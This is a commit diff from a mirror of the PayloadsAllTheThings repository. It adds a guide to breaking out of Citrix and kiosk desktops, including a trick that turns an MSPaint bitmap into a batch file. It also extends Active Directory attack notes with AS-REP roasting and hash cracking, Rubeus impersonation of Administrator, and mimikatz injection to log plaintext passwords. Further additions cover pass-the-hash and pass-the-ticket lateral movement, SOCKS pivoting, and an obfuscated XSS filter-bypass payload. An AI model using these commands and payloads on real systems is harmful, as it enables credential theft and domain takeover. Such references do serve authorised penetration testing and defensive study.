mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
Application Escape and Breakout
This commit is contained in:
parent
973f091d1b
commit
f7e8f515a5
6 changed files with 171 additions and 10 deletions
|
@ -1126,7 +1126,7 @@ Mitigations:
|
|||
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
||||
|
||||
Prerequisite:
|
||||
- Accounts have to have **DONT_REQ_PREAUTH**
|
||||
- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
|
||||
|
||||
```powershell
|
||||
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
||||
|
@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
|
|||
|
||||
# crack AS_REP messages
|
||||
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
|
@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||
5. Use Rubeus to get hash from password
|
||||
|
||||
```powershell
|
||||
Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan
|
||||
Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan
|
||||
[*] Input password : Weakest123*
|
||||
[*] Input username : swktest
|
||||
[*] Input username : swktest$
|
||||
[*] Input domain : factory.lan
|
||||
[*] Salt : FACTORY.LANswktest
|
||||
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
|
||||
|
@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||
|
||||
```powershell
|
||||
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||||
.\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||||
|
||||
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
|
||||
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
|
||||
|
|
111
Methodology and Resources/Escape Breakout.md
Normal file
111
Methodology and Resources/Escape Breakout.md
Normal file
|
@ -0,0 +1,111 @@
|
|||
# Application Escape and Breakout
|
||||
|
||||
## Summary
|
||||
|
||||
* [Gaining a command shell](#gaining-a-command-shell)
|
||||
* [Sticky Keys](#explorer---sticky-keys)
|
||||
* [Dialog Boxes](#dialog-boxes)
|
||||
* [Creating new files](#creating-new-files)
|
||||
* [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance)
|
||||
* [Exploring Context Menus](#exploring-context-menus)
|
||||
* [Save as](#save-as)
|
||||
* [Input Boxes](#input-boxes)
|
||||
* [Bypass file restrictions](#bypass-file-restrictions)
|
||||
* [Internet Explorer](#internet-explorer)
|
||||
* [Shell URI Handlers](#shell-uri-handlers)
|
||||
* [References](#references)
|
||||
|
||||
## Gaining a command shell
|
||||
|
||||
* **Shortcut**
|
||||
* [Window] + [R] -> cmd
|
||||
* [CTRL] + [ALT] + [SHIFT] -> Task Manager
|
||||
* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it
|
||||
* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe
|
||||
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
|
||||
* **Task Manager**: `File` > `New Task (Run...)`
|
||||
* **MSPAINT.exe**
|
||||
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
|
||||
* Zoom in to make the following tasks easier
|
||||
* Using the colour picker, set pixels values to (from left to right):
|
||||
* 1st: R: 10, G: 0, B: 0
|
||||
* 2nd: R: 13, G: 10, B: 13
|
||||
* 3rd: R: 100, G: 109, B: 99
|
||||
* 4th: R: 120, G: 101, B: 46
|
||||
* 5th: R: 0, G: 0, B: 101
|
||||
* 6th: R: 0, G: 0, B: 0
|
||||
* Save it as 24-bit Bitmap (*.bmp;*.dib)
|
||||
* Change its extension from bmp to bat and run
|
||||
|
||||
|
||||
## Sticky Keys
|
||||
|
||||
* Spawn the sticky keys dialog
|
||||
* Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}`
|
||||
* Hit 5 times [SHIFT]
|
||||
* Visit "Ease of Access Center"
|
||||
* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center"
|
||||
* Start the OSK (On-Screen-Keyboard)
|
||||
* You can now use the keyboard shortcut (CTRL+N)
|
||||
|
||||
## Dialog Boxes
|
||||
|
||||
### Creating new files
|
||||
|
||||
* Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
|
||||
* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32`
|
||||
|
||||
## Open a new Windows Explorer instance
|
||||
|
||||
* Right click any folder > select `Open in new window`
|
||||
|
||||
## Exploring Context Menus
|
||||
|
||||
* Right click any file/folder and explore context menus
|
||||
* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location`
|
||||
|
||||
### Save as
|
||||
|
||||
* "Save as" / "Open as" option
|
||||
* "Print" feature – selecting "print to file" option (XPS/PDF/etc)
|
||||
* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe`
|
||||
|
||||
### Input Boxes
|
||||
|
||||
Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\`
|
||||
|
||||
|
||||
### Bypass file restrictions
|
||||
|
||||
Enter *.* or *.exe or similar in `File name` box
|
||||
|
||||
## Internet Explorer
|
||||
|
||||
### Download and Run/Open
|
||||
|
||||
* Text files -> opened by Notepad
|
||||
|
||||
### Menus
|
||||
|
||||
* The address bar
|
||||
* Search menus
|
||||
* Help menus
|
||||
* Print menus
|
||||
* All other menus that provide dialog boxes
|
||||
|
||||
## Shell URI Handlers
|
||||
|
||||
* shell:DocumentsLibrary
|
||||
* shell:Librariesshell:UserProfiles
|
||||
* shell:Personal
|
||||
* shell:SearchHomeFolder
|
||||
* shell:System shell:NetworkPlacesFolder
|
||||
* shell:SendTo
|
||||
* shell:Common Administrative Tools
|
||||
* shell:MyComputerFolder
|
||||
* shell:InternetFolder
|
||||
|
||||
## References
|
||||
|
||||
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
|
||||
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
|
|
@ -138,7 +138,12 @@ or
|
|||
|
||||
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
|
||||
run autoroute -s 192.168.15.0/24
|
||||
use auxiliary/server/socks4a
|
||||
use auxiliary/server/socks_proxy
|
||||
set SRVPORT 9090
|
||||
set VERSION 4a
|
||||
# or
|
||||
use auxiliary/server/socks4a # (deprecated)
|
||||
|
||||
|
||||
# Meterpreter list all active routes
|
||||
run autoroute -p
|
||||
|
@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3
|
|||
route flush
|
||||
```
|
||||
|
||||
## Empire
|
||||
|
||||
```powershell
|
||||
(Empire) > socksproxyserver
|
||||
(Empire) > use module management/invoke_socksproxy
|
||||
(Empire) > set remoteHost 10.10.10.10
|
||||
(Empire) > run
|
||||
```
|
||||
|
||||
## sshuttle
|
||||
|
||||
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
|
||||
|
|
|
@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
|||
mimikatz # sekurlsa::logonpasswords
|
||||
```
|
||||
|
||||
- LSA is running as virtualized process (LSAISO) by Credential Guard
|
||||
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
||||
```powershell
|
||||
# Check if a process called lsaiso.exe exists on the running processes
|
||||
tasklist |findstr lsaiso
|
||||
|
||||
# If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
|
||||
#Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
|
||||
# Lets inject our own malicious Security Support Provider into memory
|
||||
# require mimilib.dll in the same folder
|
||||
mimikatz # misc::memssp
|
||||
|
||||
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
|
||||
|
|
|
@ -7,8 +7,8 @@
|
|||
* [TIP 2 - Retail Credential](#tip-2-retail-credential)
|
||||
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
|
||||
* [Metasploit](#metasploit)
|
||||
* [Metasploit - SMB](#metasploit-smb)
|
||||
* [Metasploit - Psexec](#metasploit-psexec)
|
||||
* [Metasploit - SMB](#metasploit---smb)
|
||||
* [Metasploit - Psexec](#metasploit---psexec)
|
||||
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
||||
* [WinRM](#winrm)
|
||||
* [Powershell Remoting](#powershell-remoting)
|
||||
|
@ -20,6 +20,8 @@
|
|||
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
|
||||
* [Netuse](#netuse)
|
||||
* [Runas](#runas)
|
||||
* [Pass the Ticket](#pass-the-ticket)
|
||||
* [SSH](#ssh)
|
||||
|
||||
## TIPS
|
||||
|
||||
|
@ -87,6 +89,7 @@ use exploit/windows/smb/psexec
|
|||
set RHOST 10.2.0.3
|
||||
set SMBUser username
|
||||
set SMBPass password
|
||||
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
|
||||
set PAYLOAD windows/meterpreter/bind_tcp
|
||||
run
|
||||
shell
|
||||
|
@ -123,6 +126,7 @@ Require:
|
|||
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
||||
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
||||
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
|
||||
```
|
||||
|
||||
or using a custom ruby code to interact with the WinRM service.
|
||||
|
@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
|
|||
|
||||
## Psexec.py / Smbexec.py / Wmiexec.py
|
||||
|
||||
from Impacket
|
||||
From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
|
||||
|
||||
```powershell
|
||||
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
||||
|
@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
|
|||
|
||||
# A semi-interactive shell, used through Windows Management Instrumentation.
|
||||
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
||||
root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
|
||||
|
||||
|
||||
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
|
||||
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
|
||||
|
@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
|
|||
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
||||
```
|
||||
|
||||
## Pass the Ticket
|
||||
|
||||
```powershell
|
||||
python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user
|
||||
[*] Saving ticket in user.ccache
|
||||
cp user.ccache /tmp/krb5cc_0
|
||||
export KRB5CCNAME=/tmp/krb5cc_0
|
||||
klist
|
||||
```
|
||||
|
||||
## SSH
|
||||
|
||||
:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!
|
||||
|
||||
```ps1
|
||||
cp user.ccache /tmp/krb5cc_1045
|
||||
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
||||
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
||||
- [Bypass using Katana](#bypass-using-katana)
|
||||
- [Bypass using Cuneiform](#bypass-using-cuneiform)
|
||||
- [Bypass using Lontara](#bypass-using-lontara)
|
||||
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
|
||||
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
|
||||
|
@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
|
|||
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
||||
```
|
||||
|
||||
### Bypass using Cuneiform
|
||||
|
||||
```javascript
|
||||
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
|
||||
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
|
||||
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
|
||||
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
|
||||
```
|
||||
|
||||
### Bypass using Lontara
|
||||
|
||||
```javascript
|
||||
|
|
Loading…
Reference in a new issue